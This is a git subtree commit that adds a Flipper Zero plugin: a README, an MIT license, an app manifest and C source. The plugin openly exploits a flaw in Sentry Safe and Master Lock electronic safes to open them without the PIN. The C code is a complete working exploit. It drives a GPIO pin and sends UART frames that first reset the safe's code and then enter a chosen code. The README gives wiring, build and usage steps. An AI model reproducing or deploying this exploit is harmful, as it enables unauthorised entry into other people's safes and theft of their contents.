Add 'sentry_safe/' from commit '4eb9e1ff2f8149f8df1aaf966be73f019632330f'

git-subtree-dir: sentry_safe
git-subtree-mainline: 2c8ef60beaf0fd47ae2ef5811932e05df138f1d6
git-subtree-split: 4eb9e1ff2f8149f8df1aaf966be73f019632330f

sentry_safe/.gitremotes

@@ -0,0 +1,5 @@
+[remote "upstream"]
+    url = https://github.com/H4ckd4ddy/flipperzero-sentry-safe-plugin
+    fetch = +refs/heads/*:refs/remotes/sentry-safe/*
+[alias]
+    merge-upstream = pull --no-edit upstream master

sentry_safe/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 Etienne Sellan
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

sentry_safe/README.md

@@ -0,0 +1,26 @@
+# flipperzero-sentry-safe-plugin
+
+Flipper zero exploiting vulnerability to open any Sentry Safe and Master Lock electronic safe without any pin code.
+
+[Vulnerability described here](https://github.com/H4ckd4ddy/bypass-sentry-safe)
+
+### Installation
+
+- Download [last release fap file](https://github.com/H4ckd4ddy/flipperzero-sentry-safe-plugin/releases/latest)
+- Copy fap file to the apps folder of your flipper SD card
+
+### Usage
+
+- Start "Sentry Safe" plugin
+- Place wires as described on the plugin screen
+- Press enter
+- Open safe
+
+### Build
+
+- Recursively clone your base firmware (official or not)
+- Clone this repository in `applications_user`
+- Build with `./fbt fap_dist APPSRC=applications_user/flipperzero-sentry-safe-plugin`
+- Retreive builed fap in dist subfolders
+
+(More info about build tool [here](https://github.com/flipperdevices/flipperzero-firmware/blob/dev/documentation/fbt.md))

sentry_safe/application.fam

@@ -0,0 +1,14 @@
+App(
+    appid="gpio_sentry_safe",
+    name="[GPIO] Sentry Safe",
+    apptype=FlipperAppType.EXTERNAL,
+    entry_point="sentry_safe_app",
+    requires=["gui"],
+    stack_size=1 * 1024,
+    order=40,
+    fap_icon="safe_10px.png",
+    fap_category="GPIO",
+    fap_author="@H4ckd4ddy",
+    fap_version=(1, 0),
+    fap_description="App exploiting vulnerability to open any Sentry Safe and Master Lock electronic safe without any pin code via UART pins.",
+)

sentry_safe/sentry_safe.c

@@ -0,0 +1,169 @@
+#include <furi.h>
+#include <gui/gui.h>
+#include <input/input.h>
+#include <stdlib.h>
+
+#include <furi_hal.h>
+
+typedef struct {
+    uint8_t status;
+    FuriMutex* mutex;
+} SentryState;
+
+typedef enum {
+    EventTypeTick,
+    EventTypeKey,
+} EventType;
+
+typedef struct {
+    EventType type;
+    InputEvent input;
+} Event;
+
+const char* status_texts[3] = {"[Press OK to open safe]", "Sending...", "Done !"};
+
+static void sentry_safe_render_callback(Canvas* const canvas, void* ctx) {
+    furi_assert(ctx);
+    const SentryState* sentry_state = ctx;
+    furi_mutex_acquire(sentry_state->mutex, FuriWaitForever);
+
+    // Before the function is called, the state is set with the canvas_reset(canvas)
+
+    // Frame
+    canvas_draw_frame(canvas, 0, 0, 128, 64);
+
+    // Message
+    canvas_set_font(canvas, FontPrimary);
+
+    canvas_draw_frame(canvas, 22, 4, 84, 24);
+    canvas_draw_str_aligned(canvas, 64, 15, AlignCenter, AlignBottom, "BLACK <-> GND");
+    canvas_draw_str_aligned(canvas, 64, 25, AlignCenter, AlignBottom, "GREEN <-> C1 ");
+    canvas_draw_str_aligned(
+        canvas, 64, 50, AlignCenter, AlignBottom, status_texts[sentry_state->status]);
+
+    furi_mutex_release(sentry_state->mutex);
+}
+
+static void sentry_safe_input_callback(InputEvent* input_event, FuriMessageQueue* event_queue) {
+    furi_assert(event_queue);
+
+    Event event = {.type = EventTypeKey, .input = *input_event};
+    furi_message_queue_put(event_queue, &event, FuriWaitForever);
+}
+
+void send_request(int command, int a, int b, int c, int d, int e) {
+    int checksum = (command + a + b + c + d + e);
+
+    furi_hal_gpio_init_simple(&gpio_ext_pc1, GpioModeOutputPushPull);
+    furi_hal_gpio_write(&gpio_ext_pc1, false);
+    furi_delay_ms(3.4);
+    furi_hal_gpio_write(&gpio_ext_pc1, true);
+
+    furi_hal_uart_init(FuriHalUartIdLPUART1, 4800);
+    //furi_hal_uart_set_br(FuriHalUartIdLPUART1, 4800);
+    //furi_hal_uart_set_irq_cb(FuriHalUartIdLPUART1, usb_uart_on_irq_cb, usb_uart);
+
+    uint8_t data[8] = {0x0, command, a, b, c, d, e, checksum};
+    furi_hal_uart_tx(FuriHalUartIdLPUART1, data, 8);
+
+    furi_delay_ms(100);
+
+    furi_hal_uart_set_irq_cb(FuriHalUartIdLPUART1, NULL, NULL);
+    furi_hal_uart_deinit(FuriHalUartIdLPUART1);
+}
+
+void reset_code(int a, int b, int c, int d, int e) {
+    send_request(0x75, a, b, c, d, e);
+}
+
+void try_code(int a, int b, int c, int d, int e) {
+    send_request(0x71, a, b, c, d, e);
+}
+
+int32_t sentry_safe_app(void* p) {
+    UNUSED(p);
+
+    FuriMessageQueue* event_queue = furi_message_queue_alloc(8, sizeof(Event));
+
+    SentryState* sentry_state = malloc(sizeof(SentryState));
+
+    sentry_state->status = 0;
+
+    sentry_state->mutex = furi_mutex_alloc(FuriMutexTypeNormal);
+    if(!sentry_state->mutex) {
+        FURI_LOG_E("SentrySafe", "cannot create mutex\r\n");
+        furi_message_queue_free(event_queue);
+        free(sentry_state);
+        return 255;
+    }
+
+    ViewPort* view_port = view_port_alloc();
+    view_port_draw_callback_set(view_port, sentry_safe_render_callback, sentry_state);
+    view_port_input_callback_set(view_port, sentry_safe_input_callback, event_queue);
+
+    // Open GUI and register view_port
+    Gui* gui = furi_record_open(RECORD_GUI);
+    gui_add_view_port(gui, view_port, GuiLayerFullscreen);
+
+    Event event;
+    for(bool processing = true; processing;) {
+        FuriStatus event_status = furi_message_queue_get(event_queue, &event, 100);
+
+        furi_mutex_acquire(sentry_state->mutex, FuriWaitForever);
+
+        if(event_status == FuriStatusOk) {
+            // press events
+            if(event.type == EventTypeKey) {
+                if(event.input.type == InputTypePress) {
+                    switch(event.input.key) {
+                    case InputKeyUp:
+                        break;
+                    case InputKeyDown:
+                        break;
+                    case InputKeyRight:
+                        break;
+                    case InputKeyLeft:
+                        break;
+                    case InputKeyOk:
+
+                        if(sentry_state->status == 2) {
+                            sentry_state->status = 0;
+
+                        } else if(sentry_state->status == 0) {
+                            sentry_state->status = 1;
+
+                            reset_code(1, 2, 3, 4, 5);
+                            furi_delay_ms(500);
+                            try_code(1, 2, 3, 4, 5);
+
+                            sentry_state->status = 2;
+                        }
+
+                        break;
+                    case InputKeyBack:
+                        processing = false;
+                        break;
+                    default:
+                        break;
+                    }
+                }
+            }
+        }
+
+        view_port_update(view_port);
+        furi_mutex_release(sentry_state->mutex);
+    }
+
+    // Reset GPIO pins to default state
+    furi_hal_gpio_init(&gpio_ext_pc1, GpioModeAnalog, GpioPullNo, GpioSpeedLow);
+
+    view_port_enabled_set(view_port, false);
+    gui_remove_view_port(gui, view_port);
+    furi_record_close(RECORD_GUI);
+    view_port_free(view_port);
+    furi_message_queue_free(event_queue);
+    furi_mutex_free(sentry_state->mutex);
+    free(sentry_state);
+
+    return 0;
+}